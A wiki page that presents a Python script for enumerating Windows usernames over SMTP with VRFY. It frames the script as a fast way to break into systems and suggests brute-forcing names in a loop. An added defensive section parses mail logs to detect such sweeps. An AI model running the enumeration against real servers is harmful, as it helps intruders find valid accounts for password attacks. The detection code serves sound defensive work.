Enumerate Windows Users with SMTP

From TomSchaefer.org Wiki


Enumerating Windows usernames remotely is always fun. If you want to break into a system fast, see if SMTP is running. Most admins run SMTP on their servers.

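Here is a simple script that makes this task easy. It connects to port 25, prints the server's banner, sends an SMTP VRFY command for the username given on the command line, and prints the reply.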

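 #!/usr/bin/python
 import socket
 import sys
 # Expect exactly one argument: the username to check
 if len(sys.argv) != 2:
     print("usage: <username>")
     sys.exit(0)
 # Open a TCP connection to the SMTP service on port 25
 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
 s.connect(('IPADRESS', 25))  # 'IPADRESS' is a placeholder for the server address
 # Read and show the greeting banner
 banner = s.recv(1024)
 print(banner.decode(errors='replace'))
 # Send VRFY for the supplied username and show the server's reply
 s.send(('VRFY ' + sys.argv[1] + '\r\n').encode())
 result = s.recv(1024)
 print(result.decode(errors='replace'))
 s.close()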


Now all you have to do is run this with a simple bash script to brute force usernames.
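
Seen from the mail server, the loop described above is one client issuing VRFY for many different names in a short time. The following added example (not part of the original wiki page) flags such clients in a constructed command log and lists the names the server confirmed; the log format, `LINE_RE`, `find_vrfy_sweeps` and the `min_names` threshold are assumptions for illustration.

```python
import re
from collections import defaultdict

# Constructed sample in a made-up "client= cmd= reply=" log format (assumption);
# adapt LINE_RE to the format your mail server really writes.
SAMPLE_LOG = '''\
2024-05-01T10:00:00Z client=198.51.100.20 cmd="EHLO mail.example.org" reply=250
2024-05-01T10:00:01Z client=198.51.100.20 cmd="VRFY postmaster" reply=250
2024-05-01T10:00:02Z client=198.51.100.20 cmd="MAIL FROM:<a@example.org>" reply=250
2024-05-01T10:02:10Z client=203.0.113.7 cmd="VRFY admin" reply=550
2024-05-01T10:02:10Z client=203.0.113.7 cmd="VRFY administrator" reply=250
2024-05-01T10:02:11Z client=203.0.113.7 cmd="VRFY backup" reply=550
2024-05-01T10:02:11Z client=203.0.113.7 cmd="vrfy guest" reply=550
2024-05-01T10:02:12Z client=203.0.113.7 cmd="VRFY sqlsvc" reply=252
2024-05-01T10:02:12Z client=203.0.113.7 cmd="VRFY test" reply=550
'''

LINE_RE = re.compile(
    r'client=(?P<client>\S+) cmd="(?P<verb>[A-Za-z]+)(?: (?P<arg>[^"]*))?" '
    r'reply=(?P<code>\d{3})'
)

def find_vrfy_sweeps(log_text, min_names=5):
    """Return {client: summary} for clients that VRFY'd at least min_names distinct names."""
    seen = defaultdict(lambda: {"names": set(), "confirmed": set()})
    for line in log_text.splitlines():
        m = LINE_RE.search(line)
        if not m or m["verb"].upper() != "VRFY":
            continue  # not a parsable line, or not a VRFY command
        name = (m["arg"] or "").strip().lower()
        seen[m["client"]]["names"].add(name)
        # 250/251 confirm the mailbox; 252 means "cannot verify" and discloses nothing.
        if m["code"] in ("250", "251"):
            seen[m["client"]]["confirmed"].add(name)
    return {
        client: {"distinct_names": len(e["names"]), "confirmed": sorted(e["confirmed"])}
        for client, e in seen.items()
        if len(e["names"]) >= min_names
    }

if __name__ == "__main__":
    for client, summary in find_vrfy_sweeps(SAMPLE_LOG).items():
        print(client, summary)
```

The `confirmed` list is the set of account names the server disclosed to that client, which is what an incident responder needs to scope follow-up password-guessing against those accounts.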
